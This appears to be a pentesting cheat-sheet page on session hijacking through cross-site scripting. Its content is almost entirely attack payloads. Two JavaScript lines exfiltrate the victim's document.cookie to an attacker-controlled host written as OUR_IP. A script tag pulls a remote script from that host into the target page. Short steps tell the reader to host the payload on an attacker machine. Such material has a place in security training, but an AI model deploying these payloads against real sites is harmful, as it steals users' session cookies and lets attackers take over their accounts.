search
LinkedInGithub
githubEdit

Session Hijacking

hashtag
JavaScript payload to grab cookie:

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

hashtag
Run from target side

<script src=http://OUR_IP/script.js></script>

hashtag
Make a "script.js" on the attacker machine and put JS payload in it

hashtag
Now you are good to go

PreviousdiscoveryNextXSS prevention

Last updated